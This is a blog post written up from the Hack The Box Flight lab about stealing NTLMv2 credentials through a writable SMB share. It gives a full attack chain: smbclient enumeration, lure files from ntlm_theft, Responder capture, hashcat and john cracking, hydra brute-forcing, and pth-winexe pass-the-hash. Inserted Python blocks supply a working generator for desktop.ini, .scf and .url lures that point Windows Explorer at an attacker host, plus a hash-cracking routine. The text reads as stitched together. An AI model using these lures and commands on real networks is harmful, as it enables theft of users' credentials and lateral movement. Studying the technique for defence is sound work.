2025-02-07
Discovered an Interesting NTLM Hash Capture Technique in Hack The Box Flight Lab!
While working on the Hack The Box Flight lab, I found an interesting way to capture NTLM hashes by exploiting shared folder permissions.
Approach:
1. Identified a shared folder where a user had read/write access.
2. Crafted a payload using the `ntlm_theft` tool.
3. Uploaded the payload to the shared folder.
4. Started Responder to intercept authentication requests.
5. Successfully captured the NTLMv2 hash of the user, opening doors for further post-exploitation steps.
Commands and Codes:
1. Identify Shared Folders:
smbclient -L //<target_ip> -U <username>
2. Craft Payload with `ntlm_theft`:
python3 ntlm_theft.py -g all -s <attacker_ip> -f payload
(`-g` selects the lure types to generate, `-s` is the attacker IP the lures point at, your VPN address on Hack The Box, and `-f` is the base name; the files are written to a directory named after it. An HTML lure only fires when a user opens it in a browser; for a share you want the types Windows Explorer parses on its own while a user browses the folder, such as the .lnk, .scf, .url and desktop.ini files.)
3. Upload Payload to Shared Folder:
smbclient //<target_ip>/<share_name> -U <username> -c 'put payload/<lure_file> <lure_file>'
4. Start Responder to Capture NTLM Hashes:
sudo responder -I eth0 -wrf
(`-I` is the interface Responder listens on; on Hack The Box that is normally `tun0`, not `eth0`. Start it before the lure is planted, then wait for a user to browse the share. Captured NetNTLMv2 lines are printed and also written under Responder's `logs/` directory.)
5. Crack NTLM Hash with Hashcat:
hashcat -m 5600 -a 0 captured_ntlm_hash.txt /path/to/wordlist.txt
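The procedure above hinges on what the planted file actually contains. The following is an added example, not code from the original post and not ntlm_theft's own output: it builds the three plain-text lure types (desktop.ini, .scf, .url) that make Windows Explorer fetch an icon from a UNC path on the attacker's host, which is the SMB connection Responder then answers. It assumes an attacker IP of 10.10.14.5 and a share name of `share`; the templates are modelled on the file types ntlm_theft generates but are not its exact text.

```python
# Added example (not from the original post or from ntlm_theft): generate share-dropped
# lure files that point Explorer at an attacker-controlled UNC path.
# Assumptions: attacker IP 10.10.14.5 (an HTB tun0 address), share name "share".
import os


def make_lures(attacker_ip: str, share: str = "share") -> dict:
    """Return {filename: content} for a desktop.ini, an .scf and a .url lure.

    Every file references the same UNC path; when Explorer tries to render the
    icon it authenticates to that host with the browsing user's NTLM credentials.
    """
    unc = f"\\\\{attacker_ip}\\{share}\\icon.ico"
    return {
        # Honoured when Explorer renders the folder; the containing folder needs the
        # read-only or system attribute (attrib +s) for desktop.ini customisations.
        "desktop.ini": f"[.ShellClassInfo]\r\nIconResource={unc},0\r\n",
        # Shell Command File: the icon is fetched when the file is merely listed.
        "lure.scf": f"[Shell]\r\nCommand=2\r\nIconFile={unc}\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n",
        # Internet shortcut: same trick through its IconFile key.
        "lure.url": f"[InternetShortcut]\r\nURL=https://example.invalid/\r\nIconFile={unc}\r\nIconIndex=0\r\n",
    }


def write_lures(attacker_ip: str, outdir: str) -> list:
    """Write the lures to outdir (the directory you then 'put' onto the share); return their paths."""
    os.makedirs(outdir, exist_ok=True)
    paths = []
    for name, content in make_lures(attacker_ip).items():
        path = os.path.join(outdir, name)
        # newline="" keeps the CRLF line endings Windows expects instead of translating them
        with open(path, "w", newline="") as fh:
            fh.write(content)
        paths.append(path)
    return paths


if __name__ == "__main__":
    for p in write_lures("10.10.14.5", "lures"):
        print("wrote", p)
```

Which of these fires depends on the client's Windows version and hardening, which is why ntlm_theft's `-g all` produces every type at once; plant more than one and let Responder tell you which the victim's Explorer honoured.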
What Undercode Says:
Capturing NTLM authentication is a common stepping stone to lateral movement inside a Windows network. The technique from the Hack The Box Flight lab shows how write access to a shared folder can be abused for it: a planted file (an .lnk, .scf, .url or desktop.ini) makes Windows Explorer fetch an icon from a UNC path on the attacker's host as soon as a user browses the folder, and Responder answers that SMB connection and records the NTLMv2 challenge/response. Note what is captured: not the user's NT hash but a NetNTLMv2 response, an HMAC-MD5 over a server challenge that cannot be replayed or passed around directly. It has to be cracked offline with Hashcat or John (or, while the session is still live, relayed with a tool such as ntlmrelayx to a host that does not require SMB signing).
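To make concrete what Responder records, what Hashcat then does with it, and why the pass-the-hash command listed further down needs a different kind of hash, here is an added worked example. It is not from the original post and is not Responder's or Hashcat's code. It assumes a user `alice` in domain `flight.htb` with password `Password123`, a constructed 8-byte server challenge and a constructed NTLMv2 blob; MD4 is implemented inline because `hashlib`'s MD4 is frequently unavailable under OpenSSL 3.

```python
# Added example (not from the original post): compute a NetNTLMv2 response exactly as a
# Windows client would, emit it in the user::domain:challenge:proof:blob layout Responder
# writes and hashcat -m 5600 consumes, and "crack" it with a tiny wordlist.
# Assumptions: user alice, domain flight.htb, password Password123, constructed challenge/blob.
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _f(x, y, z):
    return (x & y) | (~x & z)


def _g(x, y, z):
    return (x & y) | (x & z) | (y & z)


def _h(x, y, z):
    return x ^ y ^ z


# Per-round (mix function, additive constant, shift schedule, X index order) from RFC 1320.
_MD4_ROUNDS = (
    (_f, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
    (_g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
    (_h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
)


def md4(data: bytes) -> bytes:
    """Pure-Python MD4; hashlib.new('md4') is often disabled under OpenSSL 3."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, shifts, order in _MD4_ROUNDS:
            for i, idx in enumerate(order):
                a = _rotl((a + fn(b, c, d) + x[idx] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles so the next step updates the next word
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)). This, not the captured response, is what pass-the-hash uses."""
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr per MS-NLMP: HMAC-MD5 keyed with NTOWFv2 over server_challenge || blob."""
    ntowf_v2 = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), "md5").digest()
    return hmac.new(ntowf_v2, server_challenge + blob, "md5").digest()


def build_blob(timestamp: bytes, client_challenge: bytes, nb_domain: str) -> bytes:
    """Minimal NTLMv2_CLIENT_CHALLENGE: header, timestamp, client nonce, one AV pair, AV EOL."""
    av_pairs = struct.pack("<HH", 2, len(nb_domain) * 2) + nb_domain.encode("utf-16le")
    av_pairs += struct.pack("<HH", 0, 0)
    return b"\x01\x01\x00\x00" + b"\x00" * 4 + timestamp + client_challenge + b"\x00" * 4 + av_pairs + b"\x00" * 4


def responder_line(user, domain, server_challenge, proof, blob) -> str:
    """The layout Responder logs and hashcat -m 5600 / john --format=netntlmv2 accept."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack(line, wordlist):
    """Offline guess check against one captured line (what hashcat does at scale); returns the password or None."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.split(":")
    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_proof(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


# Constructed sample capture (assumed values, not a real one from the lab).
USER, DOMAIN, PASSWORD = "alice", "flight.htb", "Password123"
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
BLOB = build_blob(bytes.fromhex("0000000000000000"), bytes.fromhex("aabbccddeeff0011"), "FLIGHT")
CAPTURED = responder_line(USER, DOMAIN, SERVER_CHALLENGE,
                          ntlmv2_proof(PASSWORD, USER, DOMAIN, SERVER_CHALLENGE, BLOB), BLOB)

if __name__ == "__main__":
    print(CAPTURED)
    print("cracked:", crack(CAPTURED, ["summer2023", "Password123", "hunter2"]))
    # The proof above is bound to this one challenge; the reusable secret is the NT hash:
    print("NT hash for pass-the-hash:", nt_hash(PASSWORD).hex())
```

The point to take from it: the captured line is only useful as an input to guessing, because every candidate password has to be pushed through MD4, then two HMAC-MD5s bound to that particular challenge. Pass-the-hash, by contrast, needs the NT hash itself, which you only get from cracking the password or from a credential dump.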
This method is particularly useful in red team engagements where gaining access to user credentials is essential for further exploitation. Writable shares are a common attack vector, and understanding how to abuse such misconfigurations is crucial for any penetration tester.
In addition to the tools mentioned, there are several other commands and techniques that can be employed in similar scenarios:
- Enumerate SMB Shares:
nmap --script smb-enum-shares -p 445 <target_ip>
- Brute Force SMB Login (check the domain lockout policy first; a handful of wrong guesses per account can lock users out):
hydra -L userlist.txt -P passlist.txt smb://<target_ip>
- Capture NTLMv2 Hashes with Metasploit (same role as Responder; run only one of them on the interface at a time):
use auxiliary/server/capture/smb
set SRVHOST <your_ip>
run
- Analyze Captured Hashes:
john --format=netntlmv2 captured_hashes.txt
- Exploit Pass-the-Hash (this needs the user's NT hash, from a SAM or NTDS dump or computed from a cracked password, not the NetNTLMv2 response captured above; pth-winexe typically takes it as LMhash:NThash, with the empty-LM constant aad3b435b51404eeaad3b435b51404ee as the first half):
pth-winexe -U <username>%<ntlm_hash> //<target_ip> cmd
Understanding these commands and techniques is essential for any cybersecurity professional. The ability to capture and exploit NTLM hashes can provide a significant advantage in both offensive and defensive security operations.
For further reading and resources, consider the following URLs:
– Hack The Box
– Responder GitHub Repository
– Hashcat Official Site
– NTLM Theft Tool
By mastering these tools and techniques, you can enhance your skills in ethical hacking and penetration testing, making you a more effective cybersecurity professional.